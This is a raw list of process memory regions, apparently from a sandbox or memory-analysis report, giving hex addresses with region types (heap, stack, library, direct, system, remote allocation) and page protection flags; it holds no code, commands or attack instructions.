41EB000
trusted library allocation
page read and write
46BE000
heap
page read and write
450000
heap
page read and write
2B0000
heap
page read and write
385000
heap
page read and write
448000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
5CC000
heap
page read and write
4F2A000
heap
page read and write
3ED000
stack
page read and write
518000
heap
page read and write
333F000
heap
page read and write
3487000
direct allocation
page read and write
389000
heap
page read and write
40E000
heap
page read and write
4485000
heap
page read and write
13E000
heap
page read and write
370000
heap
page read and write
5964000
heap
page read and write
7FE89B05000
trusted library allocation
page read and write
4840000
heap
page read and write
441E000
heap
page read and write
1F10000
heap
page read and write
7FE8981D000
trusted library allocation
page execute and read and write
40A000
heap
page read and write
1B5C0000
heap
page read and write
445D000
heap
page read and write
7FE899E2000
trusted library allocation
page read and write
7FE89A00000
trusted library allocation
page read and write
1A5F8000
heap
page read and write
48A000
heap
page read and write
78E000
stack
page read and write
2C6000
heap
page read and write
1BF55000
heap
page read and write
3B6000
heap
page read and write
1D70000
direct allocation
page read and write
770000
heap
page read and write
4AF6000
heap
page read and write
441000
heap
page read and write
32D000
heap
page read and write
4A8000
heap
page read and write
5987000
heap
page read and write
7FE89C20000
trusted library allocation
page read and write
3D9000
heap
page read and write
26EA000
trusted library allocation
page read and write
44FD000
heap
page read and write
7FFFFF80000
trusted library allocation
page readonly
850000
heap
page read and write
1C17B000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
7FE89A60000
trusted library allocation
page read and write
7FE89A80000
trusted library allocation
page read and write
50DC000
heap
page read and write
42BE000
heap
page read and write
9A0000
heap
page read and write
50DF000
heap
page read and write
7FE89BC0000
trusted library allocation
page read and write
44F000
heap
page read and write
42BA000
heap
page read and write
20000
heap
page read and write
396B000
heap
page read and write
58BE000
heap
page read and write
4BC000
heap
page read and write
517000
heap
page read and write
1238C000
trusted library allocation
page read and write
7FE8981B000
trusted library allocation
page read and write
231F000
stack
page read and write
12521000
trusted library allocation
page read and write
3348000
heap
page read and write
42FD000
heap
page read and write
4F34000
heap
page read and write
39F2000
heap
page read and write
4C67000
heap
page read and write
7FFFFF82000
trusted library allocation
page readonly
4F30000
heap
page read and write
4474000
heap
page read and write
4F3A000
heap
page read and write
4C63000
heap
page read and write
4B70000
heap
page read and write
1C9F000
stack
page read and write
2512000
trusted library allocation
page read and write
486000
heap
page read and write
1C339000
heap
page read and write
42A0000
heap
page read and write
1AC39000
stack
page read and write
445A000
heap
page read and write
413000
heap
page read and write
3E40000
trusted library allocation
page read and write
5CB000
heap
page read and write
7FE89B19000
trusted library allocation
page read and write
2D0000
heap
page read and write
1D0000
heap
page read and write
1DEB000
heap
page read and write
29D5000
trusted library allocation
page read and write
4474000
heap
page read and write
6EE000
stack
page read and write
1ADDE000
stack
page read and write
4562000
heap
page read and write
26F000
heap
page read and write
7FFFFF87000
trusted library allocation
page execute read
41F000
heap
page read and write
3A22000
heap
page read and write
26B5000
trusted library allocation
page read and write
7FE899F2000
trusted library allocation
page read and write
216F000
stack
page read and write
4F2000
heap
page read and write
399000
heap
page read and write
486000
heap
page read and write
7FE899A7000
trusted library allocation
page read and write
364F000
stack
page read and write
300000
heap
page read and write
39A000
heap
page read and write
24AE000
trusted library allocation
page read and write
1B80D000
stack
page read and write
26ED000
trusted library allocation
page read and write
445D000
heap
page read and write
3355000
trusted library allocation
page read and write
1C30E000
heap
page read and write
3357000
heap
page read and write
46CB000
heap
page read and write
43D000
heap
page read and write
33AE000
heap
page read and write
7FE8981B000
trusted library allocation
page read and write
4474000
heap
page read and write
7FE89A18000
trusted library allocation
page read and write
4482000
heap
page read and write
7FE89A90000
trusted library allocation
page read and write
1A595000
heap
page read and write
49D000
heap
page read and write
7FE89A20000
trusted library allocation
page read and write
71F000
heap
page read and write
240000
heap
page read and write
30B000
heap
page read and write
7FE899B7000
trusted library allocation
page read and write
42A000
heap
page read and write
36A000
heap
page read and write
32C6000
heap
page read and write
5E0000
direct allocation
page read and write
1A6DE000
heap
page execute and read and write
13670000
trusted library allocation
page read and write
2E20000
heap
page read and write
1F30000
heap
page read and write
12500000
trusted library allocation
page read and write
5799000
heap
page read and write
5993000
heap
page read and write
12341000
trusted library allocation
page read and write
30E000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
473000
heap
page read and write
3EEF000
stack
page read and write
3480000
direct allocation
page read and write
44FA000
heap
page read and write
5BD000
direct allocation
page read and write
4BE000
heap
page read and write
2882000
trusted library allocation
page read and write
33C0000
trusted library allocation
page read and write
810000
heap
page read and write
3B90000
trusted library allocation
page read and write
3580000
heap
page read and write
1C412000
heap
page read and write
489000
heap
page read and write
366000
heap
page read and write
7FE89823000
trusted library allocation
page read and write
7FE89B74000
trusted library allocation
page read and write
2BE000
heap
page read and write
143000
heap
page read and write
435000
heap
page read and write
586000
heap
page read and write
2901000
trusted library allocation
page read and write
130000
trusted library allocation
page read and write
26C2000
trusted library allocation
page read and write
3A29000
heap
page read and write
43D000
heap
page read and write
1ACCB000
stack
page read and write
4A0000
heap
page read and write
1C380000
heap
page read and write
43D000
heap
page read and write
38C0000
heap
page read and write
39BD000
heap
page read and write
1C06E000
stack
page read and write
43C6000
heap
page read and write
1AF1F000
stack
page read and write
10000
heap
page read and write
1D7F000
stack
page read and write
7FE89B84000
trusted library allocation
page read and write
1F4D000
heap
page read and write
7FE89A20000
trusted library allocation
page read and write
31A000
heap
page read and write
7FE89B06000
trusted library allocation
page read and write
44D0000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
460000
heap
page read and write
1D76000
heap
page read and write
1A0000
heap
page read and write
3BE000
heap
page read and write
471000
remote allocation
page execute and read and write
2E4000
heap
page read and write
33AA000
heap
page read and write
7FE89920000
trusted library allocation
page execute and read and write
444000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
537000
heap
page read and write
1C100000
heap
page read and write
46B5000
heap
page read and write
7FE89A80000
trusted library allocation
page read and write
20000
heap
page read and write
4270000
trusted library allocation
page read and write
445A000
heap
page read and write
7FE899C3000
trusted library allocation
page read and write
7FE8983D000
trusted library allocation
page execute and read and write
7FE89A12000
trusted library allocation
page read and write
40E000
heap
page read and write
400000
heap
page read and write
7FE898C0000
trusted library allocation
page read and write
258000
heap
page read and write
4340000
heap
page read and write
450A000
heap
page read and write
8EF000
stack
page read and write
44F000
heap
page read and write
3A29000
heap
page read and write
2DD000
heap
page read and write
2F0000
trusted library allocation
page read and write
1A6D0000
heap
page execute and read and write
26BB000
trusted library allocation
page read and write
456000
heap
page read and write
419000
heap
page read and write
1CA0000
trusted library allocation
page read and write
2B30000
trusted library allocation
page execute
42BA000
heap
page read and write
61E000
stack
page read and write
33A6000
heap
page read and write
229000
heap
page read and write
41EB000
trusted library allocation
page read and write
1A84F000
stack
page read and write
7FE89B10000
trusted library allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
386000
heap
page read and write
400000
system
page execute and read and write
1B25B000
stack
page read and write
3C8000
heap
page read and write
2080000
heap
page read and write
33B7000
heap
page read and write
3E7000
heap
page read and write
1A99B000
stack
page read and write
1AD3F000
stack
page read and write
3362000
trusted library allocation
page read and write
26D8000
trusted library allocation
page read and write
4472000
heap
page read and write
4F36000
heap
page read and write
7FE89A18000
trusted library allocation
page read and write
293000
stack
page read and write
36CA000
heap
page read and write
596F000
heap
page read and write
7FE898CC000
trusted library allocation
page execute and read and write
328000
stack
page read and write
1AB91000
heap
page read and write
595000
heap
page read and write
36D1000
heap
page read and write
3FA5000
trusted library allocation
page read and write
336A000
trusted library allocation
page read and write
35F000
heap
page read and write
3A2A000
heap
page read and write
41F000
system
page execute and read and write
33DB000
trusted library allocation
page read and write
32F000
heap
page read and write
317E000
stack
page read and write
520000
heap
page read and write
3973000
heap
page read and write
447A000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
42B1000
heap
page read and write
42BA000
heap
page read and write
450A000
heap
page read and write
39F000
heap
page read and write
1C0FF000
stack
page read and write
448000
heap
page read and write
310000
heap
page read and write
1D30000
heap
page read and write
4474000
heap
page read and write
2F63000
trusted library allocation
page read and write
456000
system
page execute and read and write
26B5000
trusted library allocation
page read and write
2B0000
trusted library allocation
page read and write
50E4000
heap
page read and write
1B6E0000
heap
page read and write
5797000
heap
page read and write
4B7000
heap
page read and write
1A7C1000
heap
page read and write
4482000
heap
page read and write
1233F000
trusted library allocation
page read and write
59DA000
heap
page read and write
7FE89A30000
trusted library allocation
page read and write
1D04000
heap
page read and write
95E000
stack
page read and write
33C7000
trusted library allocation
page read and write
350000
heap
page read and write
1AA19000
stack
page read and write
29E3000
trusted library allocation
page read and write
36A000
heap
page read and write
3944000
heap
page read and write
4509000
heap
page read and write
125B6000
trusted library allocation
page read and write
280000
heap
page read and write
1B2FC000
stack
page read and write
2E7F000
stack
page read and write
7FE899B2000
trusted library allocation
page read and write
515000
heap
page read and write
26B3000
trusted library allocation
page read and write
4C55000
heap
page read and write
26D5000
trusted library allocation
page read and write
3930000
trusted library allocation
page read and write
1EFE000
stack
page read and write | page guard
386000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
42B3000
heap
page read and write
3FA5000
trusted library allocation
page read and write
3CD000
heap
page read and write
2533000
trusted library allocation
page read and write
7FE89A08000
trusted library allocation
page read and write
4C0A000
heap
page read and write
27CB000
trusted library allocation
page read and write
4C70000
trusted library allocation
page read and write
1C0EE000
stack
page read and write
3A30000
heap
page read and write
20000
heap
page read and write
2B19000
trusted library allocation
page read and write
5825000
heap
page read and write
524000
heap
page read and write
46E000
heap
page read and write
7FE89A80000
trusted library allocation
page read and write
4F35000
heap
page read and write
57DE000
heap
page read and write
7FE899BC000
trusted library allocation
page read and write
378B000
stack
page read and write
560000
heap
page read and write
2E4000
heap
page read and write
7FE89804000
trusted library allocation
page read and write
7B5000
heap
page read and write
31A0000
trusted library allocation
page read and write
2C3B000
heap
page read and write
4F37000
heap
page read and write
2ED000
heap
page read and write
7FE89B73000
trusted library allocation
page read and write
489000
heap
page read and write
33C7000
trusted library allocation
page read and write
1A2F0000
heap
page read and write
4A7000
heap
page read and write
285000
stack
page read and write
2E2000
heap
page read and write
46B9000
heap
page read and write
1E37000
direct allocation
page read and write
3B8D000
stack
page read and write
34F5000
trusted library allocation
page read and write
314000
heap
page read and write
520000
heap
page read and write
380000
heap
page read and write
3A18000
heap
page read and write
2EA0000
trusted library allocation
page read and write
285000
stack
page read and write
7FE89B50000
trusted library allocation
page read and write
2290000
heap
page execute and read and write
1B08F000
stack
page read and write
44A8000
heap
page read and write
7FE898C0000
trusted library allocation
page execute and read and write
175000
heap
page read and write
37C0000
heap
page read and write
366000
heap
page read and write
2160000
heap
page execute and read and write
116000
heap
page read and write
42BE000
heap
page read and write
1D70000
direct allocation
page read and write
26A000
heap
page read and write
1D80000
heap
page read and write
3E3000
stack
page read and write
3F70000
trusted library allocation
page read and write
4507000
heap
page read and write
334C000
heap
page read and write
42C3000
heap
page read and write
1E30000
direct allocation
page read and write
518000
heap
page read and write
2FF000
trusted library allocation
page read and write
2B11000
trusted library allocation
page read and write
44FC000
heap
page read and write
1C305000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
50E0000
heap
page read and write
2F72000
trusted library allocation
page read and write
438000
heap
page read and write
482000
heap
page read and write
273A000
trusted library allocation
page read and write
40AC000
stack
page read and write
50E3000
heap
page read and write
1AE9F000
stack
page read and write
28D000
heap
page read and write
1C09F000
stack
page read and write
1A4ED000
stack
page read and write
3930000
trusted library allocation
page read and write
3FA0000
trusted library allocation
page read and write
1B38F000
stack
page read and write
564000
heap
page read and write
357000
heap
page read and write
580D000
heap
page read and write
2FA000
heap
page read and write
1B39D000
stack
page read and write
25B000
stack
page read and write
368F000
stack
page read and write
2800000
trusted library allocation
page read and write
473D000
heap
page read and write
5790000
heap
page read and write
33C7000
trusted library allocation
page read and write
40E000
heap
page read and write
2150000
trusted library allocation
page read and write
50E000
heap
page read and write
7FE89BB4000
trusted library allocation
page read and write
7FE89A50000
trusted library allocation
page read and write
42BA000
heap
page read and write
269F000
stack
page read and write
41EB000
trusted library allocation
page read and write
429C000
heap
page read and write
4486000
heap
page read and write
3E6000
heap
page read and write
10000
heap
page read and write
26BB000
trusted library allocation
page read and write
32D4000
heap
page read and write
33AE000
heap
page read and write
2375000
trusted library allocation
page read and write
22F1000
trusted library allocation
page read and write
7FE89BC0000
trusted library allocation
page read and write
42D3000
heap
page read and write
1AB9F000
stack
page read and write
1B90000
heap
page read and write
7FE899EC000
trusted library allocation
page read and write
3DF000
stack
page read and write
3FA0000
trusted library allocation
page read and write
4C4E000
heap
page read and write
1A83C000
heap
page read and write
42B8000
heap
page read and write
7FE8980B000
trusted library allocation
page read and write
629000
heap
page read and write
486000
heap
page read and write
3240000
heap
page read and write
2290000
heap
page read and write
1A8E8000
stack
page read and write
517000
heap
page read and write
20000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
233F000
trusted library allocation
page read and write
354000
heap
page read and write
3F99000
trusted library allocation
page read and write
393000
heap
page read and write
4F2B000
heap
page read and write
26B9000
trusted library allocation
page read and write
7FE89AC0000
trusted library allocation
page read and write
1EA4000
heap
page read and write
25B2000
trusted library allocation
page read and write
7FE89A10000
trusted library allocation
page read and write
2A5E000
stack
page read and write
3955000
heap
page read and write
3487000
direct allocation
page read and write
7FE897F3000
trusted library allocation
page execute and read and write
2DD000
heap
page read and write
366000
heap
page read and write
41EB000
trusted library allocation
page read and write
283C000
stack
page read and write
1B445000
heap
page read and write
447E000
heap
page read and write
1AC26000
heap
page read and write
47E000
heap
page read and write
1AAA8000
heap
page read and write
390000
heap
page read and write
2210000
heap
page execute and read and write
1C2BE000
stack
page read and write
304000
heap
page read and write
42BA000
heap
page read and write
56B000
heap
page read and write
26D8000
trusted library allocation
page read and write
366000
heap
page read and write
7FE89A90000
trusted library allocation
page read and write
59E5000
heap
page read and write
3A0E000
heap
page read and write
42B8000
heap
page read and write
477000
heap
page read and write
1B390000
heap
page read and write
403000
heap
page read and write
4C00000
trusted library allocation
page read and write
7FE898B0000
trusted library allocation
page execute and read and write
50DA000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
1B18F000
stack
page read and write
4562000
heap
page read and write
4560000
heap
page read and write
2D5A000
stack
page read and write
46B9000
heap
page read and write
42F000
heap
page read and write
7FE89A00000
trusted library allocation
page read and write
4489000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
42B3000
heap
page read and write
4AD000
heap
page read and write
7FE8988C000
trusted library allocation
page execute and read and write
379000
heap
page read and write
335A000
trusted library allocation
page read and write
1BC0000
heap
page read and write
408000
heap
page read and write
2E0B000
stack
page read and write
4EC1000
heap
page read and write
2F72000
trusted library allocation
page read and write
380000
heap
page read and write
4AF6000
heap
page read and write
32F000
heap
page read and write
130000
trusted library allocation
page read and write
42A000
heap
page read and write
33C7000
trusted library allocation
page read and write
2853000
trusted library allocation
page read and write
14B000
stack
page read and write
3F5000
heap
page read and write
37C1000
heap
page read and write
1F46000
heap
page read and write
20000
heap
page read and write
1AD91000
heap
page read and write
4AFB000
heap
page read and write
1A8AF000
stack
page read and write
244F000
stack
page read and write
1A7DF000
stack
page read and write
7FE89A10000
trusted library allocation
page read and write
477000
heap
page read and write
447D000
heap
page read and write
10000
heap
page read and write
334A000
heap
page read and write
3C7000
stack
page read and write
46B5000
heap
page read and write
3F99000
trusted library allocation
page read and write
7FE89AB0000
trusted library allocation
page read and write
162000
stack
page read and write
2A21000
trusted library allocation
page read and write
411000
heap
page read and write
3977000
heap
page read and write
7FE89A20000
trusted library allocation
page execute and read and write
1A8AA000
stack
page read and write
26E4000
trusted library allocation
page read and write
3A11000
heap
page read and write
42CA000
heap
page read and write
24F2000
trusted library allocation
page read and write
39D2000
heap
page read and write
7FE89A00000
trusted library allocation
page execute and read and write
1B28E000
stack
page read and write
39BB000
heap
page read and write
43BF000
stack
page read and write
474000
heap
page read and write
26EC000
trusted library allocation
page read and write
42B1000
heap
page read and write
4486000
heap
page read and write
42AC000
heap
page read and write
1A5CB000
heap
page read and write
2064000
heap
page read and write
1A5BE000
heap
page read and write
291E000
trusted library allocation
page read and write
4F3A000
heap
page read and write
7FE8981D000
trusted library allocation
page execute and read and write
32C6000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
34E0000
trusted library allocation
page read and write
4BE000
heap
page read and write
5802000
heap
page read and write
510000
heap
page read and write
4F3B000
heap
page read and write
44C000
heap
page read and write
446B000
heap
page read and write
39F000
heap
page read and write
4F3000
heap
page read and write
4488000
heap
page read and write
2DC0000
trusted library allocation
page read and write
7FE89A90000
trusted library allocation
page read and write
4DB000
heap
page read and write
C2000
stack
page read and write
3B0000
trusted library allocation
page read and write
335D000
heap
page read and write
4BDA000
heap
page read and write
36A000
heap
page read and write
1C67F000
stack
page read and write
2D9000
heap
page read and write
4B75000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
2A6000
heap
page read and write
330000
heap
page read and write
7FE899F4000
trusted library allocation
page read and write
2910000
trusted library allocation
page read and write
10001000
direct allocation
page execute and read and write
1AF2E000
stack
page read and write
49D000
heap
page read and write
4294000
heap
page read and write
41EB000
trusted library allocation
page read and write
47F000
heap
page read and write
29E000
heap
page read and write
47D000
heap
page read and write
1C8D0000
heap
page read and write
526000
heap
page read and write
1E10000
direct allocation
page read and write
1C386000
heap
page read and write
4F3A000
heap
page read and write
3460000
direct allocation
page read and write
126000
heap
page read and write
1BF50000
heap
page read and write
3A17000
heap
page read and write
300A000
trusted library allocation
page read and write
5CF000
heap
page read and write
7FE898F6000
trusted library allocation
page execute and read and write
7FE89AF5000
trusted library allocation
page read and write
442000
heap
page read and write
2A0000
heap
page read and write
3510000
trusted library allocation
page read and write
27CD000
trusted library allocation
page read and write
4475000
heap
page read and write
1E37000
direct allocation
page read and write
7FE89A50000
trusted library allocation
page read and write
3B4000
heap
page read and write
3950000
trusted library allocation
page read and write
4300000
heap
page read and write
1A3A9000
stack
page read and write
7FE89BAC000
trusted library allocation
page read and write
4C53000
heap
page read and write
3975000
heap
page read and write
437000
heap
page read and write
3F99000
trusted library allocation
page read and write
26C2000
trusted library allocation
page read and write
476000
heap
page read and write
374000
heap
page read and write
450A000
heap
page read and write
1C3DC000
heap
page read and write
46C8000
heap
page read and write
288A000
trusted library allocation
page read and write
4301000
heap
page read and write
36D1000
heap
page read and write
41EB000
trusted library allocation
page read and write
40D000
heap
page read and write
1CAEE000
stack
page read and write
33C7000
trusted library allocation
page read and write
1C4A1000
heap
page read and write
2F69000
trusted library allocation
page read and write
4E7000
heap
page read and write
1B198000
heap
page read and write
40C000
heap
page read and write
7FE89A04000
trusted library allocation
page read and write
3F99000
trusted library allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
3446000
heap
page read and write
3945000
trusted library allocation
page read and write
7FE899C0000
trusted library allocation
page execute and read and write
3A13000
heap
page read and write
334E000
heap
page read and write
33C7000
trusted library allocation
page read and write
1DA000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
33C7000
trusted library allocation
page read and write
1B020000
heap
page read and write
2535000
trusted library allocation
page read and write
7FE89B70000
trusted library allocation
page read and write
67E000
stack
page read and write
1A7E8000
heap
page execute and read and write
7FE89803000
trusted library allocation
page read and write
41EB000
trusted library allocation
page read and write
594C000
heap
page read and write
3DE000
heap
page read and write
450A000
heap
page read and write
7FE899AC000
trusted library allocation
page read and write
42FE000
heap
page read and write
2B8000
stack
page read and write
3254000
heap
page read and write
7FE89A30000
trusted library allocation
page read and write
228E000
stack
page read and write
38EF000
heap
page read and write
47A000
heap
page read and write
3A0E000
heap
page read and write
1C39A000
heap
page read and write
586C000
heap
page read and write
1B48C000
stack
page read and write
5BF000
direct allocation
page read and write
1ABFB000
heap
page read and write
230000
heap
page read and write
1B2EE000
stack
page read and write
4491000
heap
page read and write
4C67000
heap
page read and write
7FE89834000
trusted library allocation
page read and write
336C000
trusted library allocation
page read and write
380000
heap
page read and write
382000
heap
page read and write
503000
heap
page read and write
10000
heap
page read and write
7FE89BE0000
trusted library allocation
page read and write
19D000
heap
page read and write
1AA36000
heap
page read and write
68D000
heap
page read and write
7FE899D0000
trusted library allocation
page read and write
7FE89BA0000
trusted library allocation
page read and write
1A4B4000
heap
page execute and read and write
7FFFFF84000
trusted library allocation
page readonly
4420000
heap
page read and write
7FE89A70000
trusted library allocation
page read and write
1B25E000
stack
page read and write
1AD3F000
heap
page read and write
3977000
heap
page read and write
318000
stack
page read and write
7FE89BA4000
trusted library allocation
page read and write
4472000
heap
page read and write
46B000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
1B0CF000
stack
page read and write
12E000
heap
page read and write
509000
heap
page read and write
4BD8000
heap
page read and write
1C3AE000
stack
page read and write
7FE898A0000
trusted library allocation
page read and write
15C000
heap
page read and write
33D0000
heap
page read and write
4B79000
heap
page read and write
412000
heap
page read and write
B40000
heap
page read and write
1B40C000
stack
page read and write
34F000
heap
page read and write
392000
heap
page read and write
272000
heap
page read and write
7FE899B3000
trusted library allocation
page read and write
307B000
stack
page read and write
31F000
heap
page read and write
445A000
heap
page read and write
40A000
heap
page read and write
1AB89000
heap
page read and write
1ACA0000
heap
page read and write
39D2000
heap
page read and write
46BE000
heap
page read and write
3493000
direct allocation
page read and write
4301000
heap
page read and write
57C7000
heap
page read and write
1B56000
heap
page read and write
33A6000
heap
page read and write
59B6000
heap
page read and write
1A310000
heap
page read and write
41EB000
trusted library allocation
page read and write
486000
heap
page read and write
170000
heap
page read and write
1AA98000
heap
page read and write
382000
heap
page read and write
7FE898EC000
trusted library allocation
page execute and read and write
3301000
heap
page read and write
486000
heap
page read and write
46CB000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
1B010000
heap
page read and write
432000
heap
page read and write
1A7E0000
heap
page execute and read and write
1ACFF000
stack
page read and write
7FE89AD0000
trusted library allocation
page read and write
7FE89840000
trusted library allocation
page read and write
4F37000
heap
page read and write
7FE89A70000
trusted library allocation
page read and write
4F00000
heap
page read and write
7FE89B71000
trusted library allocation
page read and write
4509000
heap
page read and write
1AB6A000
heap
page read and write
33A6000
heap
page read and write
42CA000
heap
page read and write
4420000
heap
page read and write
26E6000
trusted library allocation
page read and write
437C000
heap
page read and write
34DE000
stack
page read and write
1AA49000
stack
page read and write
7FE89AF0000
trusted library allocation
page read and write
1DBB000
heap
page read and write
583D000
heap
page read and write
2F67000
trusted library allocation
page read and write
1E00000
heap
page read and write
5860000
heap
page read and write
536000
heap
page read and write
4D8000
heap
page read and write
1C4F9000
heap
page read and write
555000
heap
page read and write
1A6D4000
heap
page execute and read and write
7FE89B40000
trusted library allocation
page read and write
2789000
trusted library allocation
page read and write
7FE89AE0000
trusted library allocation
page read and write
4EC0000
heap
page read and write
42B1000
heap
page read and write
333C000
heap
page read and write
350000
heap
page read and write
5CF000
heap
page read and write
2060000
heap
page read and write
39E5000
heap
page read and write
29A4000
trusted library allocation
page read and write
473000
system
page execute and read and write
58EE000
heap
page read and write
26EA000
trusted library allocation
page read and write
385000
heap
page read and write
12341000
trusted library allocation
page read and write
4C55000
heap
page read and write
520000
heap
page read and write
3CA000
heap
page read and write
3A7000
direct allocation
page read and write
3DE000
heap
page read and write
1C4AD000
stack
page read and write
1C693000
heap
page read and write
10000
heap
page read and write
1AB30000
heap
page read and write
7FE899F0000
trusted library allocation
page execute and read and write
4BDA000
heap
page read and write
236E000
trusted library allocation
page read and write
7FE89810000
trusted library allocation
page read and write
2F69000
trusted library allocation
page read and write
7FE89AE0000
trusted library allocation
page read and write
4C53000
heap
page read and write
7FE89832000
trusted library allocation
page read and write
41EB000
trusted library allocation
page read and write
397A000
heap
page read and write
4423000
heap
page read and write
33A9000
heap
page read and write
406000
heap
page read and write
1C9CB000
stack
page read and write
7FE897F4000
trusted library allocation
page read and write
1C70F000
stack
page read and write
1E04000
heap
page read and write
1B3E0000
heap
page read and write
35C000
heap
page read and write
4B7000
heap
page read and write
7FE89930000
trusted library allocation
page execute and read and write
3A29000
heap
page read and write
1A638000
heap
page read and write
3D0000
heap
page read and write
7FE899B2000
trusted library allocation
page read and write
430000
direct allocation
page read and write
8D5000
heap
page read and write
26E1000
trusted library allocation
page read and write
1B22F000
stack
page read and write
438000
heap
page read and write
34F000
heap
page read and write
9C9000
heap
page read and write
2710000
trusted library allocation
page read and write
2BDF000
trusted library allocation
page read and write
31BB000
trusted library allocation
page read and write
489000
heap
page read and write
1D40000
heap
page read and write
459000
system
page execute and read and write
22B6000
heap
page read and write
26C4000
trusted library allocation
page read and write
3979000
heap
page read and write
7FE89A14000
trusted library allocation
page read and write
445D000
heap
page read and write
3AB0000
trusted library allocation
page read and write
39BB000
heap
page read and write
26EA000
trusted library allocation
page read and write
2E0000
heap
page read and write
2F69000
trusted library allocation
page read and write
39D4000
heap
page read and write
4C67000
heap
page read and write
578C000
heap
page read and write
3F99000
trusted library allocation
page read and write
1B066000
heap
page read and write
45E000
heap
page read and write
1C38A000
heap
page read and write
4F2E000
heap
page read and write
413000
heap
page read and write
12301000
trusted library allocation
page read and write
422000
heap
page read and write
382000
heap
page read and write
2D7000
heap
page read and write
404000
heap
page read and write
3650000
heap
page read and write
39E5000
heap
page read and write
35C000
heap
page read and write
3C2000
heap
page read and write
445A000
heap
page read and write
1BF8B000
heap
page read and write
288000
heap
page read and write
1B3FB000
stack
page read and write
41B000
system
page execute and read and write
7FE8982B000
trusted library allocation
page read and write
7FE89A40000
trusted library allocation
page read and write
4A77000
heap
page read and write
2389000
trusted library allocation
page read and write
1A6A8000
heap
page execute and read and write
3F1000
heap
page read and write
1B31B000
stack
page read and write
4F3B000
heap
page read and write
366000
heap
page read and write
4C6B000
heap
page read and write
2344000
trusted library allocation
page read and write
790000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
26DF000
trusted library allocation
page read and write
4F9000
heap
page read and write
44A000
heap
page read and write
4509000
heap
page read and write
46C8000
heap
page read and write
382000
heap
page read and write
350000
heap
page read and write
7FE89813000
trusted library allocation
page execute and read and write
3F99000
trusted library allocation
page read and write
45F000
heap
page read and write
4D3000
heap
page read and write
470000
heap
page read and write
480000
heap
page read and write
3A1D000
heap
page read and write
25BE000
stack
page read and write
366000
heap
page read and write
3326000
heap
page read and write
4B36000
heap
page read and write
644000
heap
page read and write
3365000
trusted library allocation
page read and write
1B0C6000
heap
page read and write
26E5000
trusted library allocation
page read and write
33C7000
trusted library allocation
page read and write
3B90000
trusted library allocation
page read and write
122F1000
trusted library allocation
page read and write
40E000
heap
page read and write
7FE899C3000
trusted library allocation
page read and write
1EA0000
heap
page read and write
2F6F000
trusted library allocation
page read and write
7FE89800000
trusted library allocation
page read and write
72C000
stack
page read and write
30B000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
46D5000
heap
page read and write
27ED000
trusted library allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
36D6000
heap
page read and write
5C4000
heap
page read and write
3360000
trusted library allocation
page read and write
230000
heap
page read and write
1ACBE000
stack
page read and write
10016000
direct allocation
page execute and read and write
272E000
stack
page read and write
39A000
heap
page read and write
2F65000
trusted library allocation
page read and write
1233D000
trusted library allocation
page read and write
335E000
trusted library allocation
page read and write
380000
heap
page read and write
1A4B8000
heap
page execute and read and write
1AE18000
stack
page read and write
7FE89A50000
trusted library allocation
page read and write
3A19000
heap
page read and write
4C4000
heap
page read and write
10000
heap
page read and write
29A0000
heap
page read and write
2990000
trusted library allocation
page execute read
404000
heap
page read and write
4301000
heap
page read and write
3A03000
heap
page read and write
36A000
heap
page read and write
570000
heap
page read and write
366A000
stack
page read and write
7FE89A30000
trusted library allocation
page read and write
4C0000
heap
page read and write
334000
heap
page read and write
240F000
stack
page read and write
334C000
heap
page read and write
10000
heap
page read and write
7FE899E2000
trusted library allocation
page read and write
2711000
trusted library allocation
page read and write
7FE89B60000
trusted library allocation
page read and write
7FE89B10000
trusted library allocation
page read and write
444000
heap
page read and write
338000
heap
page read and write
255B000
trusted library allocation
page read and write
37B0000
heap
page read and write
44FF000
heap
page read and write
4A2000
heap
page read and write
44FB000
heap
page read and write
26A1000
trusted library allocation
page read and write
26E1000
trusted library allocation
page read and write
7FE89AA0000
trusted library allocation
page read and write
125C8000
trusted library allocation
page read and write
680000
heap
page read and write
4F3A000
heap
page read and write
4303000
heap
page read and write
817000
heap
page read and write
244D000
stack
page read and write
42B1000
heap
page read and write
3B90000
trusted library allocation
page read and write
1C28F000
stack
page read and write
330000
direct allocation
page read and write
610000
heap
page read and write
3A8000
heap
page read and write
4691000
heap
page read and write
43CA000
heap
page read and write
490000
heap
page read and write
52F000
heap
page read and write
4A2000
heap
page read and write
180000
heap
page read and write
1A7E4000
heap
page execute and read and write
42C5000
heap
page read and write
3AC0000
trusted library allocation
page read and write
2FA000
heap
page read and write
2FB000
heap
page read and write
C0000
trusted library allocation
page read and write
20000
heap
page read and write
2FE000
heap
page read and write
1245F000
trusted library allocation
page read and write
22EF000
stack
page read and write
45D000
system
page execute and read and write
258F000
stack
page read and write
479000
heap
page read and write
7FE899C0000
trusted library allocation
page execute and read and write
273000
heap
page read and write
42CA000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
43F000
heap
page read and write
30E000
heap
page read and write
12481000
trusted library allocation
page read and write
50DF000
heap
page read and write
2F65000
trusted library allocation
page read and write
7FE899B3000
trusted library allocation
page read and write
36A000
heap
page read and write
3A43000
heap
page read and write
450A000
heap
page read and write
4C5F000
heap
page read and write
5C0000
heap
page read and write
4489000
heap
page read and write
90E000
heap
page read and write
4BD3000
heap
page read and write
3A0000
heap
page read and write
1A6DE000
heap
page execute and read and write
413000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
43FC000
heap
page read and write
3C2000
heap
page read and write
383000
heap
page read and write
4299000
heap
page read and write
48E000
heap
page read and write
42BA000
heap
